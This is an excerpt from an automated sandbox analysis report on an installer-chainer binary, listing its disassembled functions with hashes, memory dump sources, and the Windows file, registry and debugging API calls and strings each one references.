Instruction Fuzzy Hash: 23321331D29F414DD7239635CC26375A289AFB73C5F15D727E86AB5EA6EB3888C34200

Function 000C50D0 Relevance: .6, Instructions: 566COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c91adfbbdf73d23fe6d923e1611e63e2bc9179884cbed4cb09a63f5c58c97e2b
Instruction ID: c0e433326343c82b5f3988e2153b22c799f6e3d873aca6d67b245608b8d807cf
Opcode Fuzzy Hash: c91adfbbdf73d23fe6d923e1611e63e2bc9179884cbed4cb09a63f5c58c97e2b
Instruction Fuzzy Hash: 24227A75A00A15DFDB25DFA8C884FAEBBF1BF44311F18816DE815AB252D731AD81CB90

Function 000C51F0 Relevance: .6, Instructions: 560COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 282efbfe191ea8a4c84992fc71e9c983910f4d5bb720af4709fb9ec3e8cf7e35
Instruction ID: 4192fd5ca5506a0473c794fefd133660c21f3110f7f17f8b40f7f24ec9dfbf31
Opcode Fuzzy Hash: 282efbfe191ea8a4c84992fc71e9c983910f4d5bb720af4709fb9ec3e8cf7e35
Instruction Fuzzy Hash: 3E224879A00658DFDB25CFA8C884FAEBBF5AF48305F15819CE805AB251D735ED81CB90

Function 000C0F80 Relevance: .5, Instructions: 502COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 09a49bf1fc0ad1753b1a6a460b42467e9f6da1ba1218da342d7813e9e4fced52
Instruction ID: 4b2de3231bbd1f8e0b27cfa2f7f03b242b4b084e6dedbe60cb8bb33c37af787c
Opcode Fuzzy Hash: 09a49bf1fc0ad1753b1a6a460b42467e9f6da1ba1218da342d7813e9e4fced52
Instruction Fuzzy Hash: 1802E071B086618BDB1CCF18C4A477EBBE2BBCA305F144A2DE49B97385CA70D945CB85

Function 000D6377 Relevance: .4, Instructions: 388COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f145b9a722d335a9652985f41f82af5a006bc341a7cd4a90f5a9942a34311b74
Instruction ID: fa32d7f899bd31692df6e9cef4688a691bc68793cf673230652a3bc03d9e9e65
Opcode Fuzzy Hash: f145b9a722d335a9652985f41f82af5a006bc341a7cd4a90f5a9942a34311b74
Instruction Fuzzy Hash: E0E17A74A00B098FCB64CF68C580AAEB7F1AF49314F24465AE4569B391D732ED86CB71

Function 000C6EF0 Relevance: .4, Instructions: 358COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 42bab21d4e795bb23d96338c5985ce07c46b01e22c226741d6e91b7fc45a48ab
Instruction ID: c04256dc86929d38fc0f8b08dcb74f344cd3c6684843b17dc7344c33ed9d9894
Opcode Fuzzy Hash: 42bab21d4e795bb23d96338c5985ce07c46b01e22c226741d6e91b7fc45a48ab
Instruction Fuzzy Hash: 5EF180745182649FD318CF1AE8E083AB7E1FBCD301F848A1EF59687751C734AA66CB61

Function 000D5FE9 Relevance: .3, Instructions: 344COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 94177871e511802e0cda5a0f20559aec7bf80757d85f2763a814e33c076b422d
Instruction ID: c47ef35d14b51e79a2a848b55762e75bc7977f3e554a06c789218dc738528249
Opcode Fuzzy Hash: 94177871e511802e0cda5a0f20559aec7bf80757d85f2763a814e33c076b422d
Instruction Fuzzy Hash: 3CC19A74A00B468FCB78CF68C590ABEBBF1AF05314F28461BD5569B392C732AD45CB61

Function 0006E5E0 Relevance: .2, Instructions: 227COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ff65f42f12fa2d9e034971d81f5d3763b3d2803ba3a0b1d15eb2731b719e3193
Instruction ID: 3f8616fd6b10f767027f4688925ec923e9d89b8b4a4414a84539a5f77a58615f
Opcode Fuzzy Hash: ff65f42f12fa2d9e034971d81f5d3763b3d2803ba3a0b1d15eb2731b719e3193
Instruction Fuzzy Hash: 6771A275E0425A8FCB18CF6CC9416AEB7F2EB58350F158269D906EB384E630ED41CBD4

Function 0006E830 Relevance: .2, Instructions: 203COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9df776428863033476983c642271569f3a84338df48397368705b4e09cc3ad42
Instruction ID: 974ccc8cf4239338f94e5db866653d19b27d44f8e147519ebf40657b0a761a71
Opcode Fuzzy Hash: 9df776428863033476983c642271569f3a84338df48397368705b4e09cc3ad42
Instruction Fuzzy Hash: A861AF75A043468FC754CF2DC88066ABBE2FFD4350F29892DE59AC7251E730E945CB82

Function 000C6950 Relevance: .1, Instructions: 137COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ca6a5bc58de809013063d6a2681a055a54a9f030fd3cdf8c7f79c10b0e74bf7e
Instruction ID: 40f5ebb7f0ad37c78f2c8bc84f4a4dcca668e2e7b4c187958be6e1247d076230
Opcode Fuzzy Hash: ca6a5bc58de809013063d6a2681a055a54a9f030fd3cdf8c7f79c10b0e74bf7e
Instruction Fuzzy Hash: 4A413A72B046614BCB288B2C8C94B6DF6D2D7D5324F0AC77DD897A72C5C5758C09C791

Function 000C6D50 Relevance: .1, Instructions: 91COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e81f87ea06f13a3d8fce88f51c0d2e89d04263d343eb0357ba226d3fdedf34e3
Instruction ID: 908152acfc0d18ae6f89da309423913e8ee0fc23750ae75014e025b18ca289b3
Opcode Fuzzy Hash: e81f87ea06f13a3d8fce88f51c0d2e89d04263d343eb0357ba226d3fdedf34e3
Instruction Fuzzy Hash: 3F312771B041750BD7608B7E8C4063ABAD1EBC6301B5942BAE4D4DB741D679E80EDBE0

Function 000B6E40 Relevance: .1, Instructions: 89COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fc2f4606307114d84482083c9021a294b13120769adfe01b4de42cae7e95416e
Instruction ID: 5e7106561decce1ea057e5d3279f396f128416703a5f4f5eff7f7740dd34e347
Opcode Fuzzy Hash: fc2f4606307114d84482083c9021a294b13120769adfe01b4de42cae7e95416e
Instruction Fuzzy Hash: 9621A5367709064B9B4CCB29DC77AB932D1E385305788D27DEA5BC7791D7388462C780

Function 000C32D0 Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f3395c45eef9510d8e6ba7a1e4d1d4521fa8a1af8b18e96eb7d1c28856ff8121
Instruction ID: faf4f0de673a04e2eefd32f461d961c888cea1f277881f50fac60216b7b66fe0
Opcode Fuzzy Hash: f3395c45eef9510d8e6ba7a1e4d1d4521fa8a1af8b18e96eb7d1c28856ff8121
Instruction Fuzzy Hash: 672174715202765BD31ACE1DC844ABAF795FB85306F81C32EED80DB289C639E925D7D0

Function 000C3230 Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9e12790dad87ec2532e809a9eef8ff034ad4c78d338c3fea1aea289e885726f6
Instruction ID: cdea07f4f2287b0bacbbcce11486cf8e1416aa634107edf6ee3c239e76a2931c
Opcode Fuzzy Hash: 9e12790dad87ec2532e809a9eef8ff034ad4c78d338c3fea1aea289e885726f6
Instruction Fuzzy Hash: 50114C315201314BDB19CA1CC885B7AB395EB85311F86C32ADD41AB148C624FD15D3D0

Function 000DFC5F Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 80c6bdc6b4215ec2eb7a84eba296c4c059d5960de37835bda912bace0ed7f662
Instruction ID: 8bccb395e6c027484e9fc5e2c37e50130145c1e1163690fcd70becea18dce12e
Opcode Fuzzy Hash: 80c6bdc6b4215ec2eb7a84eba296c4c059d5960de37835bda912bace0ed7f662
Instruction Fuzzy Hash: B1F03032620328ABCB26DB4CD905A9973E8EB45B51F155467F502EB251C6B0DE50CBE0

Function 000DFCA3 Relevance: .0, Instructions: 22COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 927bd4ffbdd7e72436beec622101bafa26e057f3d016b1e19f736927d408e671
Instruction ID: a05b794e9d657a49d266770b00d02381b4ceaf6a57e28e1683b367511527c4af
Opcode Fuzzy Hash: 927bd4ffbdd7e72436beec622101bafa26e057f3d016b1e19f736927d408e671
Instruction Fuzzy Hash: C6E08C32921278EBCB14DB8CCA44A9AF3FCEB48B00B1180A7B906D3301C270DE00C7E0

Function 000DAAA5 Relevance: .0, Instructions: 12COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4abff39c02b2234bcca4f74f3b2e18b81a818528b53d25de1ea754c51a0bb0eb
Instruction ID: 8b644711db7b158a1385d15546c32c2e71e3c5e56b4e829ec0c286c0a27ec92b
Opcode Fuzzy Hash: 4abff39c02b2234bcca4f74f3b2e18b81a818528b53d25de1ea754c51a0bb0eb
Instruction Fuzzy Hash: 95C08C38200B8547DE29CD1883753B43394E7D2792F88198EC8034B782C61EAC82D623

Function 000B0810 Relevance: 42.4, APIs: 20, Strings: 4, Instructions: 371filetimeCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,D11C52E5,?,00000000), ref: 000B0873
GetLastError.KERNEL32(?,00000000,?,?,?,?,?,?,?,000FAA0D,000000FF,?,000AB47B,?,?), ref: 000B0891
GetFileTime.KERNEL32(00000000,00000000,00000000,000AB47B,?,00000000,?,?,?,?,?,?,?,000FAA0D,000000FF), ref: 000B08BE
GetLastError.KERNEL32(?,00000000,?,?,?,?,?,?,?,000FAA0D,000000FF,?,000AB47B,?,?), ref: 000B08C8
FileTimeToSystemTime.KERNEL32(000AB47B,001119E0,?,00000000,?,?,?,?,?,?,?,000FAA0D,000000FF,?,000AB47B,?), ref: 000B094D
GetLastError.KERNEL32(?,00000000,?,?,?,?,?,?,?,000FAA0D,000000FF,?,000AB47B,?,?), ref: 000B0957
SystemTimeToFileTime.KERNEL32(001119E0,000AB47B,?,00000000,?,?,?,?,?,?,?,000FAA0D,000000FF,?,000AB47B,?), ref: 000B098F
SystemTimeToFileTime.KERNEL32(001119CE,0010BA4C,?,00000000,?,?,?,?,?,?,?,000FAA0D,000000FF,?,000AB47B,?), ref: 000B09B0
CompareFileTime.KERNEL32(0010BA4C,000AB47B,?,00000000,?,?,?,?,?,?,?,000FAA0D,000000FF,?,000AB47B,?), ref: 000B09C2
PathFileExistsW.SHLWAPI(?,?,?,?,?,?,?,?,000FAA0D,000000FF,?,000AB47B,?,?), ref: 000B0A5F
CreateFileW.KERNEL32(?,C0000000,00000000,0000000C,00000002,00000080,00000000,S-1-5-18,?,00000001,S-1-1-0,?,00000001), ref: 000B0ACE
GetLastError.KERNEL32(?,00000001,S-1-1-0,?,00000001,?,?,?,?,?,?,?,000FAA0D,000000FF,?,000AB47B), ref: 000B0ADE
CloseHandle.KERNEL32(00000000,?,00000001,S-1-1-0,?,00000001,?,?,?,?,?,?,?,000FAA0D,000000FF), ref: 000B0AE6
CopyFileExW.KERNEL32(?,?,000B1030,00111978,00000000,00000000,?,?,?,?,?,?,?,000FAA0D,000000FF), ref: 000B0B49
GetLastError.KERNEL32(?,?,?,?,?,?,?,000FAA0D,000000FF,?,000AB47B,?,?), ref: 000B0B53
DeleteFileW.KERNEL32(001115A4,?,?,?,?,?,?,?,000FAA0D,000000FF,?,000AB47B,?,?), ref: 000B0BC4
MoveFileW.KERNEL32(?,001115A4), ref: 000B0BCE
CopyFileW.KERNEL32(?,001115A4,00000000,?,?,?,?,?,?,?,000FAA0D,000000FF,?,000AB47B,?,?), ref: 000B0BE1
GetLastError.KERNEL32(?,?,?,?,?,?,?,000FAA0D,000000FF,?,000AB47B,?,?), ref: 000B0BEB

Part of subcall function 00082BA0: LoadLibraryW.KERNEL32(Advapi32.dll), ref: 00082C32
Part of subcall function 00082BA0: GetLastError.KERNEL32 ref: 00082C60

Part of subcall function 00082BA0: GetProcAddress.KERNEL32(00000000,ConvertStringSidToSidW), ref: 00082C76
Part of subcall function 00082BA0: FreeLibrary.KERNEL32(00000000), ref: 00082C8F
Part of subcall function 00082BA0: GetLastError.KERNEL32 ref: 00082C9C

Part of subcall function 00083110: LocalFree.KERNEL32(?,?,?), ref: 00083129
Part of subcall function 00083110: LocalFree.KERNEL32(?,80004005), ref: 00083139
Part of subcall function 00083110: GetLastError.KERNEL32(?,80004005), ref: 00083177

DeleteFileW.KERNEL32(?,?,?,?,?,?,?,?,000FAA0D,000000FF,?,000AB47B,?,?), ref: 000B0C16

Strings

.part, xrefs: 000B0A04
S-1-5-18, xrefs: 000B0A99
S-1-1-0, xrefs: 000B0A89
p1Wu, xrefs: 000B0BBC

Memory Dump Source

Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd

Similarity

API ID: File$ErrorLast$Time$FreeSystem$CopyCreateDeleteLibraryLocal$AddressCloseCompareExistsHandleLoadMovePathProc
String ID: .part$S-1-1-0$S-1-5-18$p1Wu
API String ID: 1651364885-2314883101
Opcode ID: e3239ff9aa9f26d7d0210fbc1ffd994cb1a77c058d26dbbdd7d639c0ce5143df
Instruction ID: e9fc36e1fdc344872510c55c085cee30976dd08fdc579c3d93176c63c881b979
Opcode Fuzzy Hash: e3239ff9aa9f26d7d0210fbc1ffd994cb1a77c058d26dbbdd7d639c0ce5143df
Instruction Fuzzy Hash: 20E1AA30A00744AFEB60DBA5CC88BABBBF4FF44714F14461CE596976E1DBB4A944CB50

Function 0007EFB0 Relevance: 33.6, APIs: 16, Strings: 3, Instructions: 368memorystringCOMMON

Download Yara Rule

APIs

CoTaskMemAlloc.OLE32(?,D11C52E5,00000000,00000000), ref: 0007F039
CharNextW.USER32(?,00000000), ref: 0007F0B9
CharNextW.USER32(00000000,?,00000000), ref: 0007F0BE
CharNextW.USER32(00000000,?,00000000), ref: 0007F0C3
CharNextW.USER32(00000000,?,00000000), ref: 0007F0C8
CharNextW.USER32(?,?,00000000,00000001,D11C52E5,00000000,00000000), ref: 0007F113
CharNextW.USER32(?,?,00000000,00000001,D11C52E5,00000000,00000000), ref: 0007F123
CharNextW.USER32(00000000,}},00000009,?,00000000,00000001,D11C52E5,00000000,00000000), ref: 0007F19F
CharNextW.USER32(00000000,?,00000000,00000001,D11C52E5,00000000,00000000), ref: 0007F1CD
EnterCriticalSection.KERNEL32(-00000005,00000001,D11C52E5,00000000,00000000), ref: 0007F21D
lstrcmpiW.KERNEL32(?,?), ref: 0007F241
LeaveCriticalSection.KERNEL32(?), ref: 0007F257
LeaveCriticalSection.KERNEL32(?,?,?), ref: 0007F290
CharNextW.USER32(00000000,?,?), ref: 0007F2E2
CharNextW.USER32(?,00000000,00000001,D11C52E5,00000000,00000000), ref: 0007F301
CoTaskMemFree.OLE32(00000000,D11C52E5,00000000,00000000), ref: 0007F34B

Strings

HKCU{Software{Classes, xrefs: 0007F0DC
HKCR, xrefs: 0007F0A0
}}, xrefs: 0007F178

Memory Dump Source

Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd

Similarity

API ID: CharNext$CriticalSection$LeaveTask$AllocEnterFreelstrcmpi
String ID: }}$HKCR$HKCU{Software{Classes
API String ID: 3576304915-1142484189
Opcode ID: f5172b788844644b94a28c2fb2490db654b70844ca878dc394dba0d17ef61cfb
Instruction ID: 71d1d6d1ea13bf2e2e3c1853a5955cfe8145d9a7660680e506bb6dcbe6428945
Opcode Fuzzy Hash: f5172b788844644b94a28c2fb2490db654b70844ca878dc394dba0d17ef61cfb
Instruction Fuzzy Hash: B2D1D270D04286DFDB20DFA8C854BBEBBF4EF45300F148569E809EB296E7789945CB94

Function 00089940 Relevance: 31.8, APIs: 12, Strings: 6, Instructions: 292libraryloaderthreadCOMMON

Download Yara Rule

APIs

InitializeCriticalSection.KERNEL32(00129B64,D11C52E5), ref: 000899B3
EnterCriticalSection.KERNEL32(00129B64,D11C52E5), ref: 000899C8
GetCurrentProcess.KERNEL32 ref: 000899D5
GetCurrentThread.KERNEL32 ref: 000899E3
SymSetOptions.DBGHELP(80000016), ref: 00089A0F
LoadLibraryA.KERNEL32(Dbghelp.dll,SymFromAddr,00000000), ref: 00089A7D
GetProcAddress.KERNEL32(00000000), ref: 00089A84
SymInitialize.DBGHELP(00000000,00000000,00000001,0010C418,00000000), ref: 00089ACC
StackWalk.DBGHELP(0000014C,?,?,?,?,00000000,00000000,*** Stack Trace (x86) ***,?,?,?), ref: 00089C0F
GetModuleHandleW.KERNEL32(00000000,*** Stack Trace (x86) ***,?,?,?), ref: 00089CC0
SymCleanup.DBGHELP(?,?), ref: 00089DA2
LeaveCriticalSection.KERNEL32(00129B64,?), ref: 00089DCD

Strings

Dbghelp.dll, xrefs: 00089A78
<--------------------MORE--FRAMES-------------------->, xrefs: 00089C5D
[0x%.8Ix] , xrefs: 00089CC7
SymFromAddr, xrefs: 00089A73
*** Stack Trace (x86) ***, xrefs: 00089BA2
MODULE_BASE_ADDRESS, xrefs: 00089CF2

Memory Dump Source

Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd

Similarity

API ID: CriticalSection$CurrentInitialize$AddressCleanupEnterHandleLeaveLibraryLoadModuleOptionsProcProcessStackThreadWalk
String ID: *** Stack Trace (x86) ***$<--------------------MORE--FRAMES-------------------->$Dbghelp.dll$MODULE_BASE_ADDRESS$SymFromAddr$[0x%.8Ix]
API String ID: 4282195395-80696534
Opcode ID: 8d13db09e7ade42e38cc18a2482d34f285599c5ccf92499f74874c2d72656886
Instruction ID: 221d92de7f45417efd01714a9fb7e4ca2d3d6cdd34ce079d369359293273378e
Opcode Fuzzy Hash: 8d13db09e7ade42e38cc18a2482d34f285599c5ccf92499f74874c2d72656886
Instruction Fuzzy Hash: 61C1D171D006A89FDB24EB64CC89BEEBBB5BF04305F1441DAE449A7292DBB41B84CF51

